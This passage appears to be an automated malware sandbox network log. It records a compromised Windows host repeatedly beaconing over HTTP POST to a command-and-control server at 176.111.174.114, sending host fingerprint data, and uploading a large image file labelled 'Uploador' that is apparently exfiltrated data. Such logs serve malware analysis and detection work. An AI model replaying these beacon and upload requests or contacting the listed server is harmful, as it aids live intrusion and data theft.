                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
523 | 176.111.174.114 | 80 | 192.168.2.4 | 50063 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:33.829791069 CEST | 12834 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:33 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
524 | 192.168.2.4 | 50065 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:34.037985086 CEST | 12835 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
525 | 176.111.174.114 | 80 | 192.168.2.4 | 50065 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:34.136025906 CEST | 12835 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:34 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          526 | 192.168.2.4 | 50066 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:34.357188940 CEST | 12836 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          527 | 176.111.174.114 | 80 | 192.168.2.4 | 50066 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:34.462151051 CEST | 12836 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:34 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          528 | 192.168.2.4 | 50067 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:34.678877115 CEST | 12837 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          529 | 176.111.174.114 | 80 | 192.168.2.4 | 50067 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:34.776732922 CEST | 12837 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:34 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          53 | 176.111.174.114 | 80 | 192.168.2.4 | 49774 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:18.968127966 CEST | 4547 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:18 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          530 | 192.168.2.4 | 50069 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:34.994765043 CEST | 12838 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          531 | 176.111.174.114 | 80 | 192.168.2.4 | 50069 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:35.095984936 CEST | 12839 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:35 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          532 | 192.168.2.4 | 50070 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:35.305525064 CEST | 12839 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          533 | 176.111.174.114 | 80 | 192.168.2.4 | 50070 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:35.405298948 CEST | 12840 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:35 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          534 | 192.168.2.4 | 50071 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:35.618347883 CEST | 12840 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          535 | 176.111.174.114 | 80 | 192.168.2.4 | 50071 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:35.720084906 CEST | 12841 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:35 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          536 | 192.168.2.4 | 50072 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:35.934020042 CEST | 12841 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          537 | 176.111.174.114 | 80 | 192.168.2.4 | 50072 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:36.035695076 CEST | 12842 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:36 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          538 | 192.168.2.4 | 50073 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:36.253153086 CEST | 12855 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Ascii: --152138533219.jpg Content-Disposition: form-data; name="data"; filename="152138533219.jpg" Content-Type: application/octet-stream
?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. 
JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:36.351643085 CEST12858OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:36.352176905 CEST12861OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:36.352317095 CEST12864OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 23:00:36.352427959 CEST12867OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 23:00:36.352761030 CEST12869OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 23:00:36.352921963 CEST12872OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 23:00:36.353107929 CEST12875OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 23:00:36.353521109 CEST12878OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
                                                                                                                                          Apr 28, 2021 23:00:36.353604078 CEST12880OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 23:00:36.353673935 CEST12883OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
539         192.168.2.4      50074        176.111.174.114  80                C:\Windows\SysWOW64\rundll32.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 23:00:36.255496025 CEST  12856               OUT        POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
54          192.168.2.4      49775        176.111.174.114  80                C:\Windows\SysWOW64\rundll32.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 22:59:19.192477942 CEST  4548                OUT        POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
